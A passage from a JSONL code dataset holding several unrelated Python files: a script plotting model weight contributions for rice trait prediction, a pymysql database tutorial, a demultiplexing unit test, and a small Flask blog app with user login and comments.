"usage_type": "name"}, {"api_name": "flask.session", "line_number": 474, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 461, "usage_type": "call"}, {"api_name": "app.app", "line_number": 461, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 479, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 479, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 476, "usage_type": "call"}, {"api_name": "app.app", "line_number": 476, "usage_type": "name"}]} +{"seq_id": "80679479", "text": "import matplotlib\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.metrics import r2_score,mean_squared_error,mean_absolute_error\nfrom sklearn.preprocessing import MinMaxScaler\nimport csv\nimport math\nimport os\n\n\npath_list = [\"results/rs/input/adaptive/\", \"results/rs/input/fixed/\",\n \"results/ss/input/adaptive/\", \"results/ss/input/fixed/\"]\n\nsave_to = [\"rs/adaptive/\", \"rs/fixed/\",\n \"ss/adaptive/\", \"ss/fixed/\"]\n\nmodels = [\"25\",\"45\",\"99\"]\n\nfor i in range(len(path_list)):\n for j in range(1,4):\n if j == 3:\n weight_files = 10\n else:\n weight_files = 4\n print(\"=========>\",j)\n print(path_list[i]+models[j-1])\n\n if j == 1:\n upper = 2\n else:\n upper = 4\n\n for jj in range(1,upper):\n freq = []\n best_labels = []\n for k in range(weight_files):\n\n dataset_file = \"avg_indices_reflectance_1617.csv\"\n dataset = pd.read_csv(dataset_file, header = 0)\n dataset_labels = list(dataset.columns.values)\n\n lab25 = dataset_labels[8:47]\n lab31 = dataset_labels[47:86]\n lab45 = dataset_labels[86:125]\n\n\n target_file = \"Rice_AgronomicTraits_1617.csv\"\n target = pd.read_csv(target_file, header = 0)\n target_labels = list(target.columns.values)\n target25 = target_labels[8:12]\n target45 = target_labels[16:20]\n target99 = target_labels[20:len(target_labels)]\n\n targets = [target25]\n targets.append(target45)\n targets.append(target99)\n\n sample_file = path_list[i]+models[j-1]+\"/Weights_model\"+str(jj)+\"_\"+str(k)+\".csv\"\n sample = pd.read_csv(sample_file, header = None)\n sample_data = sample._get_numeric_data()\n sample_np = sample_data[0:40].as_matrix()\n sample_np = np.asarray(sample_np)\n\n weights = sample_np\n\n \"\"\"\n indexes = np.zeros((weights.shape))\n threshold = 0.95\n for idx1 in range(weights.shape[0]):\n sum = 0\n temp1 = weights[idx1,:]\n temp2 = sorted(temp1, reverse = True)\n idx2 = 0\n while sum < 0.95:\n sum = sum + temp2[idx2]\n idx2 = idx2 + 1\n for ll in range(idx2):\n index = np.where(temp1 == temp2[ll])\n for lll in range(index[0].shape[0]):\n indexes[idx1,index[lll]] = 1\n\n for idx1 in range(weights.shape[0]):\n for idx2 in range(weights.shape[1]):\n if indexes[idx1,idx2] == 0:\n weights[idx1,idx2] = 0\n\n frequency = np.zeros(weights.shape[1])\n for idx1 in range(len(frequency)):\n frequency[idx1] = np.sum(indexes[:,idx1])\n \"\"\"\n frequency = np.zeros(weights.shape[1])\n for col in range(weights.shape[1]):\n sum = 0\n for row in range(weights.shape[0]):\n sum = sum + weights[row,col]\n\n frequency[col] = sum\n scaler = MinMaxScaler()\n\n frequency = np.asarray(frequency).reshape(-1,1)\n frequency = scaler.fit_transform(frequency).T\n frequency = frequency.reshape(-1,)\n for ll in range(frequency.shape[0]):\n frequency[ll] = round(frequency[ll],3)\n\n data = weights\n with open('weights/'+save_to[i]+models[j-1] + '/New_weights'+str(jj)+'_'+ str(k) + '.csv', 'w+') as csvFile:\n writer = csv.writer(csvFile,delimiter=',')\n 
writer.writerows(data)\n writer.writerow(frequency)\n csvFile.close()\n\n f1 = np.zeros(weights.shape[1])\n f2 = np.zeros(weights.shape[1])\n thres = 0.75\n error = 1e-2\n\n indexes = []\n for ll in range(frequency.shape[0]):\n if frequency[ll]>thres-error:\n f1[ll] = frequency[ll]\n indexes.append(ll)\n else:\n f2[ll] = frequency[ll]\n\n labels = []\n if jj == 1:\n labels = lab25\n labels.append('Whole_set')\n\n plt.bar(range(0,len(f1)),f1, tick_label = labels, color = \"green\")\n plt.bar(range(0,len(f2)),f2, tick_label = labels, color = \"#CC0000\")\n plt.xticks(rotation = 90, fontsize = 5)\n plt.ylabel(\"Total contribution in current output\")\n plt.axhline(thres-error, color=\"grey\", linestyle = \"--\", label = 'threshold = '+str(thres)+'\\n(error: '+str(error)+')')\n plt.legend(loc = 0, fontsize = \"xx-small\")\n plt.title(targets[j-1][k])\n plt.savefig('weights/'+save_to[i]+models[j-1] + '/Frequency'+str(jj)+'_'+ str(k)+'.png', bbox_inches='tight')\n plt.clf()\n\n elif jj == 2:\n\n labels = np.concatenate((lab25,lab45), axis = 0)\n labels = labels.tolist()\n labels.append('Whole_set')\n\n plt.bar(range(0,39),f1[0:39], tick_label = labels[0:39], color = \"green\")\n plt.bar(range(0,39),f2[0:39], tick_label = labels[0:39], color = \"#CC0000\")\n plt.ylabel(\"Total contribution in current output\")\n plt.axhline(thres-error, color=\"grey\", linestyle = \"--\", label = 'threshold = '+str(thres)+'\\n(error: '+str(error)+')')\n plt.legend(loc = 0, fontsize = \"xx-small\")\n plt.xticks(rotation = 90, fontsize = 5)\n plt.title(targets[j-1][k]+\"_a\")\n plt.savefig('weights/'+save_to[i]+models[j-1] + '/Frequency'+str(jj)+'_'+ str(k)+'a.png', bbox_inches='tight')\n plt.clf()\n\n plt.bar(range(39,79),f1[39:79], tick_label = labels[39:79], color = \"green\")\n plt.bar(range(39,79),f2[39:79], tick_label = labels[39:79], color = \"#CC0000\")\n plt.ylabel(\"Total contribution in current output\")\n plt.axhline(thres-error, color=\"grey\", linestyle = \"--\", label = 'threshold = '+str(thres)+'\\n(error: '+str(error)+')')\n plt.legend(loc = 0, fontsize = \"xx-small\")\n plt.xticks(rotation = 90, fontsize = 5)\n plt.title(targets[j-1][k]+\"_b\")\n plt.savefig('weights/'+save_to[i]+models[j-1] + '/Frequency'+str(jj)+'_'+ str(k)+'b.png', bbox_inches='tight')\n plt.clf()\n\n elif jj == 3:\n labels = np.concatenate((lab25,lab31,lab45), axis = 0)\n labels = labels.tolist()\n labels.append('Whole_set')\n\n plt.bar(range(0,39),f1[0:39], tick_label = labels[0:39], color = \"green\")\n plt.bar(range(0,39),f2[0:39], tick_label = labels[0:39], color = \"#CC0000\")\n plt.ylabel(\"Total contribution in current output\")\n plt.axhline(thres-error, color=\"grey\", linestyle = \"--\", label = 'threshold = '+str(thres)+'\\n(error: '+str(error)+')')\n plt.legend(loc = 0, fontsize = \"xx-small\")\n plt.xticks(rotation = 90, fontsize = 5)\n plt.title(targets[j-1][k]+\"_a\")\n plt.savefig('weights/'+save_to[i]+models[j-1] + '/Frequency'+str(jj)+'_'+ str(k)+'a.png', bbox_inches='tight')\n plt.clf()\n\n plt.bar(range(39,79),f1[39:79], tick_label = labels[39:79], color = \"green\")\n plt.bar(range(39,79),f2[39:79], tick_label = labels[39:79], color = \"#CC0000\")\n plt.ylabel(\"Total contribution in current output\")\n plt.axhline(thres-error, color=\"grey\", linestyle = \"--\", label = 'threshold = '+str(thres)+'\\n(error: '+str(error)+')')\n plt.legend(loc = 0, fontsize = \"xx-small\")\n plt.xticks(rotation = 90, fontsize = 5)\n plt.title(targets[j-1][k]+\"_b\")\n plt.savefig('weights/'+save_to[i]+models[j-1] + 
'/Frequency'+str(jj)+'_'+ str(k)+'b.png', bbox_inches='tight')\n plt.clf()\n\n plt.bar(range(79,118),f1[79:118], tick_label = labels[79:118], color = \"green\")\n plt.bar(range(79,118),f2[79:118], tick_label = labels[79:118], color = \"#CC0000\")\n plt.ylabel(\"Total contribution in current output\")\n plt.axhline(thres-error, color=\"grey\", linestyle = \"--\", label = 'threshold = '+str(thres)+'\\n(error: '+str(error)+')')\n plt.legend(loc = 0, fontsize = \"xx-small\")\n plt.xticks(rotation = 90, fontsize = 5)\n plt.title(targets[j-1][k]+\"_c\")\n plt.savefig('weights/'+save_to[i]+models[j-1] + '/Frequency'+str(jj)+'_'+ str(k)+'c.png', bbox_inches='tight')\n plt.clf()\n temp = []\n for idx in indexes:\n temp.append(labels[idx])\n best_labels.append([temp])\n freq.append(frequency)\n data = freq\n with open('weights/'+save_to[i] + '/Frequency_'+models[j-1]+'_'+str(jj)+'.csv', 'w+') as csvFile:\n writer = csv.writer(csvFile,delimiter=',')\n writer.writerow(labels)\n writer.writerows(data)\n csvFile.close()\n\n best_labels = np.asarray(best_labels)\n best_labels = best_labels.reshape(-1,1) # reshape() returns a new array rather than modifying in place\n data = best_labels\n with open('weights/'+save_to[i] + '/Most_important_'+models[j-1]+'_'+str(jj)+'.csv', 'w+') as csvFile:\n writer = csv.writer(csvFile,delimiter=',')\n writer.writerows(data)\n csvFile.close()\n", "sub_path": "models/modelB/b/weight_calc.py", "file_name": "weight_calc.py", "file_ext": "py", "file_size_in_byte": 10375, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pandas.read_csv", "line_number": 40, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 49, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 92, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 101, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 132, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 132, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 133, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 133, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 134, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 134, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 135, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axhline", "line_number": 136, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 136, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 137, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 137, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 138, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 138, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 139, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 139, 
"usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 140, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 144, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 148, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 148, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 149, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 149, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 150, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 150, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axhline", "line_number": 151, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 151, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 152, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 152, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 153, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 153, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 154, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 154, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 155, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 155, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 156, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 156, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 158, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 158, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 159, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 159, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 160, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 160, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axhline", "line_number": 161, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 161, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 162, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 163, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 163, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 164, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 164, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 165, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 165, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 166, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 166, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 169, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 173, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 173, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 174, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 174, "usage_type": "name"}, {"api_name": 
"matplotlib.pyplot.ylabel", "line_number": 175, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 175, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axhline", "line_number": 176, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 176, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 177, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 177, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 178, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 178, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 179, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 179, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 180, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 180, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 181, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 181, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 183, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 183, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 184, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 184, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 185, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 185, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axhline", "line_number": 186, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 186, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 187, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 187, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 188, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 188, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 189, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 189, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 190, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 190, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 191, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 191, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 193, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 193, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 194, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 194, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 195, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 195, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axhline", "line_number": 196, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 196, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 197, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 197, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 198, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 198, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", 
"line_number": 199, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 199, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 200, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 200, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 201, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 201, "usage_type": "name"}, {"api_name": "csv.writer", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 214, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 218, "usage_type": "call"}]} +{"seq_id": "237960174", "text": "# -*- coding:utf-8 -*-\n# create database dbforpymysql charset=\"utf8\";\n# create table userinfo(id int,name varchar(30),age int(10));\n# insert into userinfo(id,name,age) values (1,\"frank\",123);\nimport pymysql\n# import hashlib from sha1 #加密模块\n#连接数据库\n\ndb = pymysql.connect(host=\"192.168.3.3\",user=\"root\",passwd=\"123456\",\\\n database=\"dbforpymysql\",charset=\"utf8\",port=3306)\n#使用cursor()方法创建一个游标对象\ncursor = db.cursor()\n#使用execute()方法执行SQL语句\n# cursor.execute(\"SELECT * FROM userinfo\")\ntry: #顺序执行,出现错误则不会往下执行\n # set_id = input(\"输入id:\")\n # set_name = input(\"输入名字:\")\n sql = \"delete from userinfo where name='林乐勇'\" #汉字用单引号引起来\n cursor.execute(sql)\n print(\"delete ok\")\n # sql = \"INSERT INTO userinfo(id,name,age) VALUES(%s,%s,'123')\" #占位符%s\n sql = \"INSERT INTO userinfo(id,name,age) VALUES('123','123','123')\"\n cursor.execute(sql,[set_id,set_name]) #列表参数\n print(\"insert ok\")\n sql = \"select * from userinfo\"\n cursor.execute(sql)\n print(\"select ok\")\n db.commit()\nexcept Exception as e:\n db.rollback()\n print(\"failed\",e)\n#使用fetall()获取全部数据,fetchone()获取第一条查询数据,fetchmany(n)获取那条数据\ndata = cursor.fetchall()\ndataone = cursor.fetchone()\n#打印获取到的数据\nprint(data) #返回数据类型为元组嵌套\nprint(\"fetchont:\",dataone) #fetch的数据,取一条,少一条,类似迭代器\n#提交到数据库\n# db.rollback()\ndb.commit()\nprint('ok')\n#关闭游标和数据库的连接\ncursor.close()\ndb.close()\n#运行结果\n", "sub_path": "linux/language/python/code/mysql.py", "file_name": "mysql.py", "file_ext": "py", "file_size_in_byte": 1776, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pymysql.connect", "line_number": 9, "usage_type": "call"}]} +{"seq_id": "628228067", "text": "import unittest\nimport os\nimport json\nimport gzip\nimport odybcl2fastq.odybcl2fastq as odybcl2fastq\n\nclass DemultiplexTests(unittest.TestCase):\n\n def setUp(self):\n self.sample_data_dir = (os.path.abspath( os.path.dirname( __file__ ) ) +\n '/sample_data/')\n\n def tearDown(self):\n pass\n\n def _load_json(self, path):\n obj = {}\n with open(path, 'r') as data:\n obj = json.load(data)\n return obj\n\n def test_demultiplex(self):\n cmd_path = 'tests/sample_data/cmd.json'\n cmd = self._load_json(cmd_path)\n code, demult_out, demult_err = odybcl2fastq.run_cmd(cmd)\n assert code == 0\n fastq_file = 'MDT1_SI_GA_A11_1_S1_L001_R1_001.fastq.gz'\n fastq_control_path = 'tests/sample_data/' + fastq_file\n fastq_path = '/n/ngsdata/odybcl2fastq_test/171101_D00365_1013_AHYYTWBCXY/bambahmukku/' + fastq_file\n control = gzip.open(fastq_control_path, 'r')\n test = gzip.open(fastq_path, 'r')\n for i in range(7):\n control_ln = next(control)\n test_ln = next(test)\n assert(control_ln == test_ln)\n\nif __name__ == '__main__':\n unittest.main()\n", "sub_path": "tests/demultiplex_tests.py", "file_name": "demultiplex_tests.py", "file_ext": "py", 
"file_size_in_byte": 1180, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "unittest.TestCase", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 10, "usage_type": "call"}, {"api_name": "json.load", "line_number": 19, "usage_type": "call"}, {"api_name": "odybcl2fastq.odybcl2fastq.run_cmd", "line_number": 25, "usage_type": "call"}, {"api_name": "odybcl2fastq.odybcl2fastq", "line_number": 25, "usage_type": "name"}, {"api_name": "gzip.open", "line_number": 30, "usage_type": "call"}, {"api_name": "gzip.open", "line_number": 31, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 38, "usage_type": "call"}]} +{"seq_id": "115546557", "text": "from flask import Flask, render_template\nfrom flask_login import LoginManager, login_user, login_required, logout_user, current_user\nfrom werkzeug.utils import redirect\n\n#from flask_restful import abort, Api\nfrom api import news_resource\nfrom data import db_session, api\nfrom data.news import News\nfrom data.users import User\nfrom data.comments import Comments\nfrom forms.comment import CommentForm\n\nfrom forms.register import RegisterForm\nfrom forms.login import LoginForm\n\napp = Flask(__name__)\n#api = Api(app)\n\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\n\n# для списка объектов\n#api.add_resource(news_resource.NewsListResource, '/api/v2/news')\n# для одного объекта\n#api.add_resource(news_resource.NewsResource, '/api/v2/news/')\n\n@login_manager.user_loader\ndef load_user(user_id):\n db_sess = db_session.create_session()\n return db_sess.query(User).get(user_id)\n\napp.config['SECRET_KEY'] = 'yandexlyceum_secret_key'\n\n@app.route(\"/\")\ndef index():\n db_sess = db_session.create_session()\n news = db_sess.query(News).filter(News.is_private != True)\n return render_template(\"index.html\", news=news, title=\"Записи в блоге\")\n\n@app.route(\"/news\")\ndef news():\n db_sess = db_session.create_session()\n data = db_sess.query(News)\n return render_template(\"news.html\", news=data, title=\"Новости\")\n\n@app.route(\"/news/\", methods=['GET', 'POST'])\ndef news_item(id):\n db_sess = db_session.create_session()\n if current_user.is_authenticated:\n form = CommentForm()\n if form.validate_on_submit():\n comm = Comments()\n comm.connected_to_id = id\n comm.table_name = News.__tablename__\n comm.author_id = current_user.id\n comm.text = form.text.data\n db_sess.add(comm)\n db_sess.commit()\n else:\n form = None\n\n data = db_sess.query(News).get(id)\n comments = db_sess.query(Comments).filter(Comments.connected_to_id == id,\n Comments.table_name == News.__tablename__)\n\n return render_template(\"news_item.html\", news=data, title=data.title, comments=comments, form=form)\n\n@app.route('/register', methods=['GET', 'POST'])\ndef reqister():\n form = RegisterForm()\n if form.validate_on_submit():\n if form.password.data != form.password_again.data:\n return render_template('register.html', title='Регистрация',\n form=form,\n message=\"Пароли не совпадают\")\n db_sess = db_session.create_session()\n if db_sess.query(User).filter(User.email == form.email.data).first():\n return render_template('register.html', title='Регистрация',\n form=form,\n message=\"Такой пользователь уже есть\")\n user = User(\n name=form.name.data,\n email=form.email.data,\n 
about=form.about.data\n )\n user.set_password(form.password.data)\n db_sess.add(user)\n db_sess.commit()\n return redirect('/')\n return render_template('register.html', title='Регистрация', form=form)\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n form = LoginForm()\n if form.validate_on_submit():\n db_sess = db_session.create_session()\n user = db_sess.query(User).filter(User.email == form.email.data).first()\n if user and user.check_password(form.password.data):\n login_user(user, remember=form.remember_me.data)\n return redirect(\"/\")\n return render_template('login.html',\n message=\"Неправильный логин или пароль\",\n form=form)\n return render_template('login.html', title='Авторизация', form=form)\n\n@app.route('/logout')\n@login_required\ndef logout():\n logout_user()\n return redirect(\"/\")\n\ndef abort_if_news_not_found(news_id):\n session = db_session.create_session()\n news = session.query(News).get(news_id)\n if not news:\n abort(404, message=f\"News {news_id} not found\")\n\n\nfrom flask import make_response,jsonify\n\n@app.errorhandler(404)\ndef not_found(error):\n return make_response(jsonify({'error': 'Not found'}), 404)\n\ndef main():\n db_session.global_init(\"db/website.sqlite\")\n\n db_sess = db_session.create_session()\n db_sess.add(News('Test', 'Text', '', 1))\n db_sess.commit()\n for user in db_sess.query(User).all():\n print(user)\n users = db_sess.query(User).filter(User.about.contains('пользоват'), User.id != 1, User.id % 2 != 0).all()\n\n for user in users:\n print(user)\n\n #app.register_blueprint(api.blueprint)\n app.run()\n\nif __name__ == '__main__':\n\n main()", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 4916, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask.Flask", "line_number": 16, "usage_type": "call"}, {"api_name": "flask_login.LoginManager", "line_number": 19, "usage_type": "call"}, {"api_name": "data.db_session.create_session", "line_number": 29, "usage_type": "call"}, {"api_name": "data.db_session", "line_number": 29, "usage_type": "name"}, {"api_name": "data.users.User", "line_number": 30, "usage_type": "argument"}, {"api_name": "data.db_session.create_session", "line_number": 36, "usage_type": "call"}, {"api_name": "data.db_session", "line_number": 36, "usage_type": "name"}, {"api_name": "data.news.News", "line_number": 37, "usage_type": "argument"}, {"api_name": "data.news.News.is_private", "line_number": 37, "usage_type": "attribute"}, {"api_name": "flask.render_template", "line_number": 38, "usage_type": "call"}, {"api_name": "data.db_session.create_session", "line_number": 42, "usage_type": "call"}, {"api_name": "data.db_session", "line_number": 42, "usage_type": "name"}, {"api_name": "data.news.News", "line_number": 43, "usage_type": "argument"}, {"api_name": "flask.render_template", "line_number": 44, "usage_type": "call"}, {"api_name": "data.db_session.create_session", "line_number": 48, "usage_type": "call"}, {"api_name": "data.db_session", "line_number": 48, "usage_type": "name"}, {"api_name": "flask_login.current_user.is_authenticated", "line_number": 49, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 49, "usage_type": "name"}, {"api_name": "forms.comment.CommentForm", "line_number": 50, "usage_type": "call"}, {"api_name": "data.comments.Comments", "line_number": 52, "usage_type": "call"}, {"api_name": "data.news.News.__tablename__", "line_number": 54, 
"usage_type": "attribute"}, {"api_name": "data.news.News", "line_number": 54, "usage_type": "name"}, {"api_name": "flask_login.current_user.id", "line_number": 55, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 55, "usage_type": "name"}, {"api_name": "data.news.News", "line_number": 62, "usage_type": "argument"}, {"api_name": "data.comments.Comments", "line_number": 63, "usage_type": "argument"}, {"api_name": "data.comments.Comments.connected_to_id", "line_number": 63, "usage_type": "attribute"}, {"api_name": "data.comments.Comments.table_name", "line_number": 64, "usage_type": "attribute"}, {"api_name": "data.comments.Comments", "line_number": 64, "usage_type": "name"}, {"api_name": "data.news.News.__tablename__", "line_number": 64, "usage_type": "attribute"}, {"api_name": "data.news.News", "line_number": 64, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 66, "usage_type": "call"}, {"api_name": "data.title", "line_number": 66, "usage_type": "attribute"}, {"api_name": "forms.register.RegisterForm", "line_number": 70, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 73, "usage_type": "call"}, {"api_name": "data.db_session.create_session", "line_number": 76, "usage_type": "call"}, {"api_name": "data.db_session", "line_number": 76, "usage_type": "name"}, {"api_name": "data.users.User", "line_number": 77, "usage_type": "argument"}, {"api_name": "data.users.User.email", "line_number": 77, "usage_type": "attribute"}, {"api_name": "flask.render_template", "line_number": 78, "usage_type": "call"}, {"api_name": "data.users.User", "line_number": 81, "usage_type": "call"}, {"api_name": "werkzeug.utils.redirect", "line_number": 89, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 90, "usage_type": "call"}, {"api_name": "forms.login.LoginForm", "line_number": 95, "usage_type": "call"}, {"api_name": "data.db_session.create_session", "line_number": 97, "usage_type": "call"}, {"api_name": "data.db_session", "line_number": 97, "usage_type": "name"}, {"api_name": "data.users.User", "line_number": 98, "usage_type": "argument"}, {"api_name": "data.users.User.email", "line_number": 98, "usage_type": "attribute"}, {"api_name": "flask_login.login_user", "line_number": 100, "usage_type": "call"}, {"api_name": "werkzeug.utils.redirect", "line_number": 101, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 102, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 105, "usage_type": "call"}, {"api_name": "flask_login.logout_user", "line_number": 110, "usage_type": "call"}, 